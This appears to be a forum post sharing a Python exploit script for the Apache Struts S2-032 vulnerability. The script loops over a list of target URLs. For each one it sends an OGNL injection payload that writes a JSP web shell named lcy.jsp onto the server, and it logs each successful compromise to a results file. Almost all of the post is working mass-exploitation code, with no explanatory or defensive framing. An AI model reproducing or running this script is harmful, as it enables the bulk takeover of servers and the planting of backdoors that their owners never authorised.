Struts S2-032
[Python] 纯文本查看 复制代码 #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date: 2016-04-26 17:38:52
# @Last Modified by: Lcy
# @Last Modified time: 2016-04-26 18:20:45
import requests
import sys
if len(sys.argv) < 2:
print "Example: python exp.py list.txt"
exit()
weblist = sys.argv[1]
payload = "?method:%23_memberAccess%[email]3d@ognl.OgnlContext[/email]@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=lcy.jsp&content=%3C%25@%20page%20language%3D%22java%22%20pageEncoding%3D%22gbk%22%25%3E%3Cjsp%3Adirective.page%20import%3D%22java.io.File%22%2f%3E%3Cjsp%3Adirective.page%20import%3D%22java.io.OutputStream%22%2f%3E%3Cjsp%3Adirective.page%20import%3D%22java.io.FileOutputStream%22%2f%3E%3C%25%20int%20i%3D0%3BString%20method%3Drequest.getParameter%28%22act%22%29%3Bif%28method%21%3Dnull%26%26method.equals%28%22yoco%22%29%29%7BString%20url%3Drequest.getParameter%28%22url%22%29%3BString%20text%3Drequest.getParameter%28%22smart%22%29%3BFile%20f%3Dnew%20File%28url%29%3Bif%28f.exists%28%29%29%7Bf.delete%28%29%3B%7Dtry%7BOutputStream%20o%3Dnew%20FileOutputStream%28f%29%3Bo.write%28text.getBytes%28%29%29%3Bo.close%28%29%3B%7Dcatch%28Exception%20e%29%7Bi%2b%2b%3B%25%3E0%3C%25%7D%7Dif%28i%3D%3D0%29%7B%25%3E1%3C%25%7D%25%3E%3Cform%20action%3D%27%3Fact%3Dyoco%27%20method%3D%27post%27%3E%3Cinput%20size%3D%22100%22%20value%3D%22%3C%25%3Dapplication.getRealPath%28%22%2f%22%29%20%25%3E%22%20name%3D%22url%22%3E%3Cbr%3E%3Ctextarea%20rows%3D%2220%22%20cols%3D%2280%22%20name%3D%22smart%22%3E"
f = open(weblist)
for l in f.readlines():
url = l.strip() + payload
try:
r = requests.get(url,timeout=5)
res = r.text
if "lcy.jsp" in res:
f = open("result.txt","a")
f.write(l.strip() + payload + "\r\n\r\n")
print "\n %s Getshell Success!" % l.strip(),
except:
pass |